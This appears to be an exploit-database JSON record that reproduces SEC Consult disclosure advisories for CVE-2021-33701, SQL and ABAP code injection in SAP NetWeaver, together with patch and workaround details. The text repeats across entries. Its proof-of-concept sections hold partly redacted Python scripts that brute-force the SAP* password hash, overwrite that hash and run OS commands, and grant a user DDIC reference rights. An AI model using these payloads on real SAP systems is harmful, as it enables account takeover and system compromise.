\n \nFurther, authorization to perform function calls (S_RFC) has to be \ngranted for remote exploitation or access to SE37 for local privilege escalation \n \nIn the majority of cases internal RFC communications are nowadays still found \nto be unencrypted. This increases the risk that attackers wiretap account \npasswords. Once such user is hijacked, the attacker has gained all necessary \nprerequisites for further attacks as described in this advisory. \n \n \nProof of concept: \n----------------- \n1. Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701) \n \nExample A: Arbitrary Read \n \nAs a proof of concept, a script was created to brute force the password hash \nof the SAP* users in client 000 while authenticated to client 001. This \nalso demonstrates the possibility of breaking out of the current client context. \nFor this example, a boolean based Blind SQL attack was used. In \norder to get the exploitation to work, an arbitrary existing table has to be \nspecified for the parameter I_TABNAME (in this PoC ZDEMO_SOH was chosen). 
\n \nThe following excerpt shows the source code of the script: \n \n* ************************************************************************** * \n#!/usr/bin/env python3 \nfrom pyrfc import Connection \nfrom string import ascii_letters \n \ndef generate_alphabet(): \nalph = [] \nfor c in ascii_letters: \nalph.append(c) \nfor i in range(0,10): \nalph.append(str(i)) \nalph.append('+') \nalph.append('/') \nalph.append('=') \nreturn alph \n \nif __name__ == '__main__': \nfinal_str = \"\" \nconn = Connection(ashost=\"XX.XX.XX.XX\", sysnr=\"00\", client= \"001\", \nuser= \"Peter\", passwd=\"Sap123456\", lang='EN') \nalph = generate_alphabet() \n \nprint(\"Brute Forcing SAP* password hash in client 000 ...\") \n \nfor i in range(16, 61): \ntoggle = 0 \nfor c in alph: \nwhere_clause = (\"('\" + c + \n\"' IN (SELECT SUBSTRING(PWDSALTEDHASH,\" + str(i) + \n\",1) from USR02 WHERE BNAME='SAP*' AND MANDT='000'))\") \n \n[ --- PoC partially removed --- ] \n \nif(result['ET_COUNT'][0]['RECCNT'] != 0): \nfinal_str += c \nprint(\"{x-issha, 1024}\" + final_str,end='\\r') \nprint (\"\\n\") \n* ************************************************************************** * \n \nRunning the code produces the following output: \n \n$> poc_iuuc_remote.py \nBrute Forcing SAP* password hash in client 000... \n{x-issha, 1024}DRM3SNvfwWWsDf71QYyx+5L0AkN3l0nyKgPjvlBsPqE= \n \n \nExample B: Arbitrary Write \n \nThe next proof of concept demonstrates arbitrary write to the database by using \nstacked queries. The following payload inserts the password hash corresponding \nto the plaintext password \"Test123\" into the SAP* users of all clients and \nthen authenticates with the user SAP* on the other client 000. 
Afterwards, the \nOS command \"ip addr\" is executed: \n \n* ************************************************************************** * \n#!/usr/bin/env python3 \nfrom pyrfc import Connection \n \ndef read_ABAP_Report(): \nwith open('X:\\\\test.abap') as file: \ncontent = file.readlines() \ncontent = [x.strip() for x in content] \nreturn content \n \nif __name__ == '__main__': \nfinal_str = \"\" \nconn = Connection(ashost=\"XX.XX.XX.XX\", sysnr=\"00\", client= \"001\", \nuser= \"Peter\", passwd=\"Sap123456\", lang='EN') \n \nwhere_clause = ( \n\"1 = 1 ); UPDATE USR02 SET PWDSALTEDHASH = \" \n\"'{x-issha, 1024}voJRVT/rrJ31pxfmhb/zaBqhXA81CYKSnylMlKr/CkE=' \" \n\"WHERE BNAME = 'SAP*'; COMMIT WORK; --\") \n \n[ --- PoC partially removed --- ] \n \nconn2 = Connection(ashost=\"XX.XX.XX.XX\", sysnr=\"00\", client= \"000\", \nuser= \"SAP*\", passwd=\"Test123\", lang='EN') \n \ninject = ['REPORT Z_TEST213.' \n'DATA(c) = \\'ip addr\\'.', \n'DATA t TYPE TABLE OF char255.', \n'DATA l(250) TYPE c.', \n'CALL \\'SYSTEM\\' ID \\'COMMAND\\' FIELD c ID \\'TAB\\' FIELD t.', \n'LOOP AT t INTO l.', \n'WRITE: / l.', \n'ENDLOOP.'] \n \nparams = {'PROGRAM':inject} \nresult = conn2.call('/SAPDS/RFC_ABAP_INSTALL_RUN', **params) \nfor x in result['WRITES']: \nprint(x['ZEILE']) \n* ************************************************************************** * \n \nRunning the code produces the following output: \n \n$> .\\poc_iuuc_remote2.py \n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group \ndefault ql \nlink/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 \ninet 127.0.0.1/8 scope host lo \nvalid_lft forever preferred_lft forever \ninet6 ::1/128 scope host \nvalid_lft forever preferred_lft forever \n2: enp0s3: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc pfifo_fast state \nDOWN \nlink/ether XX:XX:XX:XX:XX:XX brd ff:ff:ff:ff:ff:ff \n3: enp0s8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state U \nP grou \nlink/ether XX:XX:XX:XX:XX:XX brd 
ff:ff:ff:ff:ff:ff \ninet XX.XX.XX.XX/24 brd XX.XX.XX.255 scope global noprefixroute enp0s8 \nvalid_lft forever preferred_lft forever \ninet6 fe80::a00:27ff:fec3:fa40/64 scope link \nvalid_lft forever preferred_lft forever \n \n \nVulnerable / tested versions: \n----------------------------- \nThis vulnerability has been tested on SAP Netweaver 752 SP-LEVEL 0004 \nDMIS Release 2011_1_731 SP-Level 0016 SP SAPK-11616INDMIS. \n \nAccording to the vendor, the following products / versions are affected: \n* SAPSCORE 125 < SAPK-12502INSAPSCORE \n* S4CORE 105 < SAPK-10503INS4CORE \n* S4CORE 104 < SAPK-10405INS4CORE \n* S4CORE 103 < SAPK-10307INS4CORE \n* S4CORE 102 < SAPK-10209INS4CORE \n* S4CORE 101 < SAPK-10111INS4CORE \n* S4CORE 100 \n* DMIS 2018_1_752 < SAPK-20106INDMIS \n* DMIS 2020 < SAPK-20202INDMIS \n* DMIS 2011_1_700 < SAPK-11321INDMIS \n* DMIS 2011_1_710 < SAPK-11421INDMIS \n* DMIS 2011_1_730 < SAPK-11521INDMIS \n* DMIS 2011_1_731 < SAPK-11621INDMIS \n* DMIS 2011_1_620 < SAPK-11121INDMIS \n* DMIS 2011_1_640 < SAPK-11221INDMIS \n \n \nVendor contact timeline: \n------------------------ \n2021-07-08: Contacting SAP Product Security Response Team through Web Portal \nhttps://www.sap.com/about/trust-center/security/incident-management.html \nID SR-21-00009 has been assigned \n2021-07-19: Vendor confirms vulnerability \n2021-08-10: SNote 3078312 with patch released \n2021-11-17: SEC Consult sends final advisory to vendor and informs about release \ndate \n2021-11-18: SAP requests to obfuscate or remove PoC \n2021-12-14: Coordinated release of security advisory \n \n \nSolution: \n--------- \nSEC Consult advises all SAP\u00ae customers to implement SAP Security Note \n3078312 immediately. Note that Security Note 3078312 contains no automatic \ncorrection instructions for customers who run systems with DMIS versions or \nSupport Package levels lower than DMIS 2011 SP10 (2015). Please refer to the \nsection workaround. 
\n \n \nWorkaround: \n----------- \nIn lower SP levels, the correction can be applied manually by modifying \nfunction module IUUC_RECON_RC_COUNT_TABLE_BIG adding the following statement \ndirectly after the authorization check: \n \nASSERT it_where_clause[] IS INITIAL. \n \n \nAdvisory URL: \n------------- \nhttps://sec-consult.com/vulnerability-lab/ \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult, an Atos company \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an \nAtos company. It ensures the continued knowledge gain of SEC Consult in the \nfield of network and application security to stay ahead of the attacker. The \nSEC Consult Vulnerability Lab supports high-quality penetration testing and \nthe evaluation of new offensive and defensive technologies for our customers. \nHence our customers obtain the most current information about vulnerabilities \nand valid recommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://sec-consult.com/career/ \n \nInterested in improving your cyber security with the experts of SEC Consult? 
\nContact our local offices https://sec-consult.com/contact/ \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF Raschin Tavakoli / @2021 \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/165303/SA-20211214-0.txt", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-20T06:01:53", "description": "SAP Netweaver suffers from a remote ADBC SQL injection vulnerability in IUUC_RECON_RC_COUNT_TABLE_BIG. Other software and various versions are also affected.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-15T00:00:00", "type": "zdt", "title": "SAP Netweaver IUUC_RECON_RC_COUNT_TABLE_BIG SQL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33701"], "modified": "2021-12-15T00:00:00", "id": "1337DAY-ID-37148", "href": "https://0day.today/exploit/description/37148", "sourceData": 
"==============================================================================\n title: Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG\n product: SAP Netweaver\n vulnerable version: see vulnerable/tested versions section below\n fixed version: see solution section below\n CVE number: CVE-2021-33701\n SAP SNote: 3078312\n impact: Critical\n CVSS 3.1 Score: 9.1\n CVSS 3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\n homepage: https://www.sap.com/\n found: 2021-07-07\n by: Raschin Tavakoli (Office Vienna)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult, an Atos company\n Europe | Asia | North America\n\n https://www.sec-consult.com\n\n==============================================================================\n\nVendor description:\n-------------------\n\"SAP SE is a German multinational software corporation based in Walldorf,\nBaden-W\u00fcrttemberg, that develops enterprise software to manage business\noperations and customer relations. The company is especially known for its ERP\nsoftware. SAP is the largest non-American software company by revenue, the\nworld's third-largest publicly-traded software company by revenue, and the\nlargest German company by market capitalisation.\"\n\nSource: https://en.wikipedia.org/wiki/SAP\n\n\nBusiness recommendation:\n------------------------\nSAP\u00ae released the patch (SNote 3078312) and SEC Consult advises all\nSAP\u00ae customers to update their systems immediately.\n\nAn in-depth security analysis performed by security professionals is\nhighly advised, as the software may be affected from further security issues.\n\n\nVulnerability overview/description:\n-----------------------------------\n1. Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701)\n\nThe IT_WHERE_CLAUSE parameter of the function module\nIUUC_RECON_RC_COUNT_TABLE_BIG is vulnerable to an ADBC SQL Injection. 
The\nfunction is part of the package CNV_INC_PROCESSING_REMOTE inside the function\nmodule group IUUC_REMOTE. It is typically used to count table records in the\ncontext of logging table and trigger creation.\n\nADBC is an API for the Native SQL interface of the AS ABAP that is based on\nABAP Objects and can be used to pass Native SQL statements to the database\ninterface. ADBC SQL injections are a very serious type of vulnerability, as\nthey allow attackers not only to access data directly at the database layer\nbut also to break out of the current client context. Moreover, stacked queries\ncan be used to perform arbitrary read/write commands. All of this leads to\nfull compromise of the SAP application server.\n\nAs the affected function module is remote-enabled, it allows attackers to\nperform remote attacks via RFC.\n\nNote that the vulnerability was originally found by SEC Consult during\nresearch on a system with DMIS in version DMIS 2011_1_731 SP 0013. In this\nversion, the same parameter IT_WHERE_CLAUSE was vulnerable to an ABAP\nCommand Injection.\n\nThat vulnerability seems to have been fixed insufficiently, leaving behind this\nADBC SQL Injection. The earlier advisory can be viewed at the following URL:\n\nhttps://sec-consult.com/vulnerability-lab/advisory/remote-abap-code-injection-in-sap-netweaver/\n\n\nAttack Prerequisites\n--------------------\n1. 
Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701)\n\nThe first prerequisite is the authorization object S_DMIS (SAP SLO Data migration\nserver) with at least the following settings:\n\nMBT_PR_ARE: SAP Landscape Transformation\nMBT_PR_LEV: (not needed to be set)\nACTVT: 03 Display\n\nNote that it is common practice that authorization objects are (mis)configured\nwith wildcards, which increases the likelihood of exploitation of the vulnerability.\n\nFurther, authorization to perform function calls (S_RFC) has to be\ngranted for remote exploitation, or access to SE37 for local privilege escalation.\n\nIn the majority of cases, internal RFC communications are nowadays still found\nto be unencrypted. This increases the risk that attackers wiretap account\npasswords. Once such a user is hijacked, the attacker has gained all necessary\nprerequisites for further attacks as described in this advisory.\n\n\nProof of concept:\n-----------------\n1. Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701)\n\nExample A: Arbitrary Read\n\nAs a proof of concept, a script was created to brute-force the password hash\nof the SAP* user in client 000 while authenticated to client 001. This\nalso demonstrates the possibility of breaking out of the current client context.\nFor this example, a boolean-based blind SQL injection was used. 
In\norder to get the exploitation to work, an arbitrary existing table has to be\nspecified for the parameter I_TABNAME (in this PoC ZDEMO_SOH was chosen).\n\nThe following excerpt shows the source code of the script:\n\n* ************************************************************************** *\n#!/usr/bin/env python3\nfrom pyrfc import Connection\nfrom string import ascii_letters\n\ndef generate_alphabet():\n alph = []\n for c in ascii_letters:\n alph.append(c)\n for i in range(0,10):\n alph.append(str(i))\n alph.append('+')\n alph.append('/')\n alph.append('=')\n return alph\n\nif __name__ == '__main__':\n final_str = \"\"\n conn = Connection(ashost=\"XX.XX.XX.XX\", sysnr=\"00\", client= \"001\",\n user= \"Peter\", passwd=\"Sap123456\", lang='EN')\n alph = generate_alphabet()\n\n print(\"Brute Forcing SAP* password hash in client 000 ...\")\n\n for i in range(16, 61):\n toggle = 0\n for c in alph:\n where_clause = (\"('\" + c +\n \"' IN (SELECT SUBSTRING(PWDSALTEDHASH,\" + str(i) +\n \",1) from USR02 WHERE BNAME='SAP*' AND MANDT='000'))\")\n\n [ --- PoC partially removed --- ]\n\n if(result['ET_COUNT'][0]['RECCNT'] != 0):\n final_str += c\n print(\"{x-issha, 1024}\" + final_str,end='\\r')\n print (\"\\n\")\n* ************************************************************************** *\n\nRunning the code produces the following output:\n\n$> poc_iuuc_remote.py\nBrute Forcing SAP* password hash in client 000...\n{x-issha, 1024}DRM3SNvfwWWsDf71QYyx+5L0AkN3l0nyKgPjvlBsPqE=\n\n\nExample B: Arbitrary Write\n\nThe next proof of concept demonstrates arbitrary write to the database by using\nstacked queries. The following payload inserts the password hash corresponding\nto the plaintext password \"Test123\" into the SAP* users of all clients and\nthen authenticates with the user SAP* on the other client 000. 
Afterwards, the\nOS command \"ip addr\" is executed:\n\n* ************************************************************************** *\n#!/usr/bin/env python3\nfrom pyrfc import Connection\n\ndef read_ABAP_Report():\n with open('X:\\\\test.abap') as file:\n content = file.readlines()\n content = [x.strip() for x in content]\n return content\n\nif __name__ == '__main__':\n final_str = \"\"\n conn = Connection(ashost=\"XX.XX.XX.XX\", sysnr=\"00\", client= \"001\",\n user= \"Peter\", passwd=\"Sap123456\", lang='EN')\n\n where_clause = (\n \"1 = 1 ); UPDATE USR02 SET PWDSALTEDHASH = \"\n \"'{x-issha, 1024}voJRVT/rrJ31pxfmhb/zaBqhXA81CYKSnylMlKr/CkE=' \"\n \"WHERE BNAME = 'SAP*'; COMMIT WORK; --\")\n\n [ --- PoC partially removed --- ]\n\n conn2 = Connection(ashost=\"XX.XX.XX.XX\", sysnr=\"00\", client= \"000\",\n user= \"SAP*\", passwd=\"Test123\", lang='EN')\n\n inject = ['REPORT Z_TEST213.'\n 'DATA(c) = \\'ip addr\\'.',\n 'DATA t TYPE TABLE OF char255.',\n 'DATA l(250) TYPE c.',\n 'CALL \\'SYSTEM\\' ID \\'COMMAND\\' FIELD c ID \\'TAB\\' FIELD t.',\n 'LOOP AT t INTO l.',\n 'WRITE: / l.',\n 'ENDLOOP.']\n\n params = {'PROGRAM':inject}\n result = conn2.call('/SAPDS/RFC_ABAP_INSTALL_RUN', **params)\n for x in result['WRITES']:\n print(x['ZEILE'])\n* ************************************************************************** *\n\nRunning the code produces the following output:\n\n$> .\\poc_iuuc_remote2.py\n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group\n default ql\n link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n inet 127.0.0.1/8 scope host lo\n valid_lft forever preferred_lft forever\n inet6 ::1/128 scope host\n valid_lft forever preferred_lft forever\n2: enp0s3: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc pfifo_fast state\n DOWN\n link/ether XX:XX:XX:XX:XX:XX brd ff:ff:ff:ff:ff:ff\n3: enp0s8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state U\n P grou\n link/ether XX:XX:XX:XX:XX:XX brd ff:ff:ff:ff:ff:ff\n inet 
XX.XX.XX.XX/24 brd XX.XX.XX.255 scope global noprefixroute enp0s8\n valid_lft forever preferred_lft forever\n inet6 fe80::a00:27ff:fec3:fa40/64 scope link\n valid_lft forever preferred_lft forever\n\n\nVulnerable / tested versions:\n-----------------------------\nThis vulnerability has been tested on SAP Netweaver 752 SP-LEVEL 0004\nDMIS Release 2011_1_731 SP-Level 0016 SP SAPK-11616INDMIS.\n\nAccording to the vendor, the following products / versions are affected:\n* SAPSCORE 125 < SAPK-12502INSAPSCORE\n* S4CORE 105 < SAPK-10503INS4CORE\n* S4CORE 104 < SAPK-10405INS4CORE\n* S4CORE 103 < SAPK-10307INS4CORE\n* S4CORE 102 < SAPK-10209INS4CORE\n* S4CORE 101 < SAPK-10111INS4CORE\n* S4CORE 100\n* DMIS 2018_1_752 < SAPK-20106INDMIS\n* DMIS 2020 < SAPK-20202INDMIS\n* DMIS 2011_1_700 < SAPK-11321INDMIS\n* DMIS 2011_1_710 < SAPK-11421INDMIS\n* DMIS 2011_1_730 < SAPK-11521INDMIS\n* DMIS 2011_1_731 < SAPK-11621INDMIS\n* DMIS 2011_1_620 < SAPK-11121INDMIS\n* DMIS 2011_1_640 < SAPK-11221INDMIS\n\n\nVendor contact timeline:\n------------------------\n2021-07-08: Contacting SAP Product Security Response Team through Web Portal\n https://www.sap.com/about/trust-center/security/incident-management.html\n ID SR-21-00009 has been assigned\n2021-07-19: Vendor confirms vulnerability\n2021-08-10: SNote 3078312 with patch released\n2021-11-17: SEC Consult sends final advisory to vendor and informs about release\n date\n2021-11-18: SAP requests to obfuscate or remove PoC\n2021-12-14: Coordinated release of security advisory\n\n\nSolution:\n---------\nSEC Consult advises all SAP\u00ae customers to implement SAP Security Note\n3078312 immediately. Note that Security Note 3078312 contains no automatic\ncorrection instructions for customers who run systems with DMIS versions or\nSupport Package levels lower than DMIS 2011 SP10 (2015). 
Please refer to the\nsection workaround.\n\n\nWorkaround:\n-----------\nIn lower SP levels, the correction can be applied manually by modifying\nfunction module IUUC_RECON_RC_COUNT_TABLE_BIG adding the following statement\ndirectly after the authorization check:\n\nASSERT it_where_clause[] IS INITIAL.\n", "sourceHref": "https://0day.today/exploit/37148", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-12-15T19:43:26", "description": "SAP Netweaver version SAP DMIS 2011_1_731 SP 0013 suffers from a remote ABAP code injection vulnerability in IUUC_RECON_RC_COUNT_TABLE_BIG.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-15T00:00:00", "type": "zdt", "title": "SAP Netweaver IUUC_RECON_RC_COUNT_TABLE_BIG ABAP Code Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33701"], "modified": "2021-12-15T00:00:00", "id": "1337DAY-ID-37147", "href": "https://0day.today/exploit/description/37147", "sourceData": "=======================================================================\n title: Remote ABAP Code Injection in SAP 
IUUC_RECON_RC_COUNT_TABLE_BIG\n product: SAP Netweaver\n vulnerable version: SAP DMIS 2011_1_731 SP 0013\n fixed version: see solution section below\n CVE number: CVE-2021-33701\n SAP Note: 3078312\n impact: Critical\n CVSS 3.1 Score: 9.1\n CVSS 3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\n homepage: https://www.sap.com/\n found: 2021-07-16\n by: Raschin Tavakoli (Office Vienna)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult, an Atos company\n Europe | Asia | North America\n\n https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\"SAP SE is a German multinational software corporation based in Walldorf,\nBaden-W\u00fcrttemberg, that develops enterprise software to manage business\noperations and customer relations. The company is especially known for its ERP\nsoftware. SAP is the largest non-American software company by revenue, the\nworld's third-largest publicly-traded software company by revenue, and the\nlargest German company by market capitalisation.\"\n\nSource: https://en.wikipedia.org/wiki/SAP\n\n\nBusiness recommendation:\n------------------------\nSAP\u00ae released the patch (SNote 3078312) and SEC Consult advises all SAP\u00ae\ncustomers to update their systems immediately.\n\nAn in-depth security analysis performed by security professionals is\nhighly advised, as the software may be affected by further security issues.\n\n\nVulnerability overview/description:\n-----------------------------------\n1. Remote ABAP Code Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701)\n\nThe IT_WHERE_CLAUSE parameter of the function module\nIUUC_RECON_RC_COUNT_TABLE_BIG is vulnerable to an ABAP Code Injection.\nUnfiltered user input is used to generate ABAP code dynamically via the\nGENERATE SUBROUTINE statement, which then gets executed with a PERFORM\nstatement. 
Because the attacker can freely choose the characters that are used\nin these fields, they can execute arbitrary ABAP code.\n\nAs the affected function module is remote-enabled, it allows attackers to\nperform remote attacks via RFC.\n\nNote that the vulnerable code part inside the function module has been changed\nin newer releases. The original code that was vulnerable to an ABAP Code\nInjection has been replaced with an ADBC driver call. Unfortunately, this\nchange also introduced an SQL injection vulnerability, which was addressed in\nSNote 3078312.\n\nThat issue has been reported in a separate SEC Consult advisory and can be viewed\nat the following URL:\n\nhttps://sec-consult.com/vulnerability-lab/advisory/remote-adbc-sql-injection-in-sap-netweaver\n\n\nAttack Prerequisites\n--------------------\n1. Remote ABAP Code Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701)\n\nThe first prerequisite is the authorization object S_DMIS (SAP SLO Data migration\nserver) with at least the following settings:\n\nMBT_PR_ARE: SAP Landscape Transformation\nMBT_PR_LEV: (not needed to be set)\nACTVT: 03 Display\n\nNote that it is common practice that authorization objects are (mis)configured\nwith wildcards, which increases the likelihood of exploitation of the vulnerability.\n\nFurther, of course, authorization to perform function calls (S_RFC) has to be\ngranted.\n\nIn the majority of cases, internal RFC communications are nowadays still found\nto be unencrypted. This increases the risk that attackers wiretap DMIS-related\naccount passwords. Once such a user is hijacked, the attacker has gained all\nnecessary prerequisites for further attacks as described in this advisory.\n\n\nProof of concept:\n-----------------\n1. 
Remote ABAP Code Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701)\n\nAs a proof of concept, a script was created that assigns the attacker himself\nthe reference user DDIC inside the table REFUSER:\n\n* ************************************************************************** *\n#!/usr/bin/env python3\nfrom pyrfc import Connection\n\nif __name__ == '__main__':\n\n mandt = {'000', '001'} # selected for demonstration purpose\n conn = Connection(ashost=\"XX.XX.XX.XX\", sysnr=\"00\", client=\"001\",\n user=\"DEVELOPER\", passwd=\"Sap123456\", lang='EN')\n\n print(\"USREFUS before:\")\n result = conn.call('RFC_READ_TABLE',\n QUERY_TABLE='USREFUS',\n FIELDS=['MANDT', 'BNAME', 'REFUSER'],\n DELIMITER='|'\n )\n column_values = []\n\n for line in result['DATA']:\n print(line['WA'])\n\n [ --- PoC partially removed --- ]\n\n print(\"\\nSending payload ...\\n\")\n\n result = conn.call('RFC_READ_TABLE',\n QUERY_TABLE='USREFUS',\n FIELDS=['MANDT', 'BNAME', 'REFUSER'],\n DELIMITER='|'\n )\n column_values = []\n\n print(\"USREFUS after:\")\n for line in result['DATA']:\n print(line['WA'])\n* ************************************************************************** *\n\nRunning the code produces the following output:\n\n$> iuuc_generic_abap.py\nUSREFUS before:\n001|DEVELOPER |\n001|BWDEVELOPER |\n001|TEST |\n001|E_TEST |\n001|DDIC |\n001|SAP* |\n\nSending payload ...\n\nUSREFUS after:\n001|BWDEVELOPER |\n001|TEST |\n001|E_TEST |\n001|DDIC |\n001|SAP* |\n001|DEVELOPER |DDIC\n \n \nVulnerable / tested versions:\n-----------------------------\nThis vulnerability has been tested on SAP Netweaver 752, 0001 (SP-Level),\nSAPK-11616INDMIS (Support Package) SAP DMIS 2011_1_731.\n\n\nVendor contact timeline:\n------------------------\n2021-07-18: Contacting SAP Product Security Response Team through Web Portal\n https://www.sap.com/about/trust-center/security/incident-management.html\n ID SR-21-00018 has been assigned\n2021-07-21: Vendor informs that the discussion has been 
taken up to the\n application team\n2022-07-21: Vendor confirms vulnerability but marks it internally as a duplicate\n for CVE-2021-33701 (see our other advisory for this function module)\n2021-11-17: SEC Consult sends final advisory to vendor and informs about release\n date\n2021-12-14: Coordinated release of security advisory\n\n\nSolution:\n---------\nSEC Consult advises all SAP\u00ae customers to implement SAP Security Note\n3078312 immediately. Note that Security Note 3078312 contains no automatic\ncorrection instructions for customers who run systems with DMIS versions or\nSupport Package levels lower than DMIS 2011 SP10 (2015). Please refer to the\nsection workaround.\n\n\nWorkaround:\n-----------\nIn lower SP levels, the correction can be applied manually by modifying\nfunction module IUUC_RECON_RC_COUNT_TABLE_BIG adding the following statement\ndirectly after the authorization check:\n\nASSERT it_where_clause[] IS INITIAL.\n", "sourceHref": "https://0day.today/exploit/37147", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}